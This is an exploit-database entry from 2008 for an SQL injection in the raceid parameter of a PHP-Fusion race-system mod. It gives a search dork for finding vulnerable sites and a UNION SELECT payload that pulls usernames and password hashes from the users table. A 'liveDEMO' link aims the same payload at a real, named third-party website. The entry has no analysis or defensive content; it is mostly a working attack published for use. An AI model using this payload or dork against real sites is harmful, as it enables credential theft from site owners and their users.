PHP-Fusion Mod triscoop_race_system (raceid) SQL Injection Vuln

2008-10-05T00:00:00
ID 1337DAY-ID-3844
Type zdt
Reporter boom3rang
Modified 2008-10-05T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ===============================================================
PHP-Fusion Mod triscoop_race_system (raceid) SQL Injection Vuln
===============================================================


########################################################
PHP-Fusion Mod triscoop_race_system (raceid) Remote SQL Injection Vulnerability
########################################################

++++++++++++++++++++++++++++
Author :         boom3rang
++++++++++++++++++++++++++++


[+] Dork:     infusions/triscoop_race_system/race_details.php?

[+] Example:         http://localhost/infusions/triscoop_race_system/race_details.php?raceid=[ exploit ]

[+] Exploit
--------------------------------

http://localhost/infusions/triscoop_race_system/race_details.php?raceid=-9999+union+all+select+1,null,null,4,null,user_name,7,user_password,null,0,null,null,13,14,null,16,17,18,19,20,21,22+from+fusion_users--

--------------------------------


[+] liveDEMO: 

http://www.triscoop.com/infusions/triscoop_race_system/race_details.php?raceid=-9999+union+all+select+1,user_name,null,4,null,user_name,7,user_password,null,0,null,null,13,14,null,16,17,18,19,20,21,22+from+fusion_users--


============================



#  0day.today [2018-01-02]  #